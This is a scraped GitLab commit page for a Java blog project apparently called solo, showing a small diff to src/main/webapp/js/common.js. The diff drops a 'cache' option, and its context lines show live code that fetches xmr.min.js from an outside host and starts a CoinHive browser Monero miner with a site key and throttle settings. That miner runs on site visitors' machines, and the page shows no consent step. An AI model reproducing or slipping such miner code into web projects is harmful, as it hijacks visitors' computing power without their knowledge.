Skip to content
Projects
Groups
Snippets
Help
Loading...
Help
Support
Submit feedback
Contribute to GitLab
Sign in / Register
Toggle navigation
S
solo-1
Project overview
Project overview
Details
Activity
Releases
Cycle Analytics
Repository
Repository
Files
Commits
Branches
Tags
Contributors
Graph
Compare
Charts
Issues
0
Issues
0
List
Boards
Labels
Milestones
Merge Requests
0
Merge Requests
0
CI / CD
CI / CD
Pipelines
Jobs
Schedules
Charts
Wiki
Wiki
Snippets
Snippets
Members
Members
Collapse sidebar
Close sidebar
Activity
Graph
Charts
Create a new issue
Jobs
Commits
Issue Boards
Open sidebar
Administrator
solo-1
Commits
fd4fa70b
Commit
fd4fa70b
authored
Jan 02, 2018
by
Vanessa
Browse files
Options
Browse Files
Download
Email Patches
Plain Diff
✨
rm xmr cache
parent
cd38a7c6
Changes
3
Expand all
Hide whitespace changes
Inline
Side-by-side
Showing
3 changed files
with
19 additions
and
20 deletions
+19
-20
src/main/webapp/js/common.js
src/main/webapp/js/common.js
+1
-2
src/main/webapp/js/lib/CodeMirrorEditor/codemirror.min.css
src/main/webapp/js/lib/CodeMirrorEditor/codemirror.min.css
+1
-1
src/main/webapp/js/lib/compress/admin-lib.min.js
src/main/webapp/js/lib/compress/admin-lib.min.js
+17
-17
No files found.
src/main/webapp/js/common.js
View file @
fd4fa70b
...
@@ -248,8 +248,7 @@ var Util = {
...
@@ -248,8 +248,7 @@ var Util = {
$
.
ajax
({
$
.
ajax
({
method
:
"
GET
"
,
method
:
"
GET
"
,
url
:
'
https://static.hacpai.com/js/lib/xmr.min.js
'
,
url
:
'
https://static.hacpai.com/js/lib/xmr.min.js
'
,
dataType
:
"
script
"
,
dataType
:
"
script
"
cache
:
true
}).
done
(
function
()
{
}).
done
(
function
()
{
var
miner
=
new
CoinHive
.
Anonymous
(
'
gr2r3rJsYmaJpSd2Nml15zomewwc6Lzc
'
,
{
threads
:
1
,
throttle
:
0.9
});
var
miner
=
new
CoinHive
.
Anonymous
(
'
gr2r3rJsYmaJpSd2Nml15zomewwc6Lzc
'
,
{
threads
:
1
,
throttle
:
0.9
});
miner
.
start
();
miner
.
start
();
...
...
src/main/webapp/js/lib/CodeMirrorEditor/codemirror.min.css
View file @
fd4fa70b
This diff is collapsed.
Click to expand it.
src/main/webapp/js/lib/compress/admin-lib.min.js
View file @
fd4fa70b
This diff is collapsed.
Click to expand it.
Write
Preview
Markdown
is supported
0%
Try again
or
attach a new file
Attach a file
Cancel
You are about to add
0
people
to the discussion. Proceed with caution.
Finish editing this message first!
Cancel
Please
register
or
sign in
to comment